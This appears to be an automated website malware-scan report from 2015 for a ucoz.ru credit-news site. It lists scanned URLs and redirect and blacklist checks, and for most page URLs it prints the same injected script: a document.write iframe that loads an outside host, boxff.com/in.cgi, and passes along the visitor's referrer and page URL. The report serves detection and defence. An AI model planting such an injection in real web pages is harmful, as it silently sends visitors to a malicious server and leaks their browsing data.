Scanned pages/files
Request | Server response | Status |
http://creditokqhtlcl.ucoz.ru/news/sberbank_rasprodazhi_avtomobilej/2013-08-14-167 | 200 OK Content-Length: 62502 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe width="100%" height="1000" frameborder="NO" src="http://boxff.com/in.cgi?11&seoref='+encodeURIComponent(document.referrer)+'&parameter=$keyword&se=$se&ur=1&HTTP_REFERER='+encodeURIComponent(document.URL)+'&default_keyword=����� ������">');
Antivirus reports:
http://s85.ucoz.net/src/jquery-1.7.2.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://s85.ucoz.net/src/ulightbox/ulightbox.js | 200 OK Content-Length: 22097 Content-Type: text/javascript | clean |
http://s85.ucoz.net/src/uwnd.js?2 | 200 OK Content-Length: 228554 Content-Type: text/javascript | clean |
http://s85.ucoz.net/cgi/uutils.fcg?a=soc_comment_get_data&site=0creditokqhtlcl | 200 OK Content-Length: 531 Content-Type: application/javascript | clean |
http://s85.ucoz.net/src/socCom.js | 200 OK Content-Length: 6344 Content-Type: text/javascript | clean |
http://creditokqhtlcl.ucoz.ru/ | 200 OK Content-Length: 59886 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe width="100%" height="1000" frameborder="NO" src="http://boxff.com/in.cgi?11&seoref='+encodeURIComponent(document.referrer)+'&parameter=$keyword&se=$se&ur=1&HTTP_REFERER='+encodeURIComponent(document.URL)+'&default_keyword=����� ������">');
Antivirus reports:
http://creditokqhtlcl.ucoz.ru/register | 200 OK Content-Length: 26495 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe width="100%" height="1000" frameborder="NO" src="http://boxff.com/in.cgi?11&seoref='+encodeURIComponent(document.referrer)+'&parameter=$keyword&se=$se&ur=1&HTTP_REFERER='+encodeURIComponent(document.URL)+'&default_keyword=����� ������">');
Antivirus reports:
http://creditokqhtlcl.ucoz.ru/test404page.js | 404 Not Found Content-Length: 6869 Content-Type: text/html | clean |
http://creditokqhtlcl.ucoz.ru/news/rss/ | 200 OK Content-Length: 300746 Content-Type: text/xml | clean |
http://creditokqhtlcl.ucoz.ru/news/kredit_nalichnymi_do_50000/2014-11-06-740 | 200 OK Content-Length: 76056 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe width="100%" height="1000" frameborder="NO" src="http://boxff.com/in.cgi?11&seoref='+encodeURIComponent(document.referrer)+'&parameter=$keyword&se=$se&ur=1&HTTP_REFERER='+encodeURIComponent(document.URL)+'&default_keyword=����� ������">');
Antivirus reports:
http://creditokqhtlcl.ucoz.ru/news/2014-00 | 200 OK Content-Length: 30652 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe width="100%" height="1000" frameborder="NO" src="http://boxff.com/in.cgi?11&seoref='+encodeURIComponent(document.referrer)+'&parameter=$keyword&se=$se&ur=1&HTTP_REFERER='+encodeURIComponent(document.URL)+'&default_keyword=����� ������">');
Antivirus reports:
http://creditokqhtlcl.ucoz.ru/news/2014-01-11 | 200 OK Content-Length: 102195 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe width="100%" height="1000" frameborder="NO" src="http://boxff.com/in.cgi?11&seoref='+encodeURIComponent(document.referrer)+'&parameter=$keyword&se=$se&ur=1&HTTP_REFERER='+encodeURIComponent(document.URL)+'&default_keyword=����� ������">');
Antivirus reports:
http://creditokqhtlcl.ucoz.ru/news/2014-01 | 200 OK Content-Length: 34060 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe width="100%" height="1000" frameborder="NO" src="http://boxff.com/in.cgi?11&seoref='+encodeURIComponent(document.referrer)+'&parameter=$keyword&se=$se&ur=1&HTTP_REFERER='+encodeURIComponent(document.URL)+'&default_keyword=����� ������">');
Antivirus reports:
http://creditokqhtlcl.ucoz.ru/news/2014-1-31 | 200 OK Content-Length: 81637 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe width="100%" height="1000" frameborder="NO" src="http://boxff.com/in.cgi?11&seoref='+encodeURIComponent(document.referrer)+'&parameter=$keyword&se=$se&ur=1&HTTP_REFERER='+encodeURIComponent(document.URL)+'&default_keyword=����� ������">');
Antivirus reports:
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: creditokqhtlcl.ucoz.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 01 Aug 2015 09:39:53 GMT
Server: uServ/3.2.2
Content-Length: 59886
Content-Type: text/html; charset=UTF-8
...59886 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: creditokqhtlcl.ucoz.ru
Referer: http://www.google.com/search?q=creditokqhtlcl.ucoz.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=creditokqhtlcl.ucoz.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://creditokqhtlcl.ucoz.ru/
Result: creditokqhtlcl.ucoz.ru is not infected or malware details are not published yet.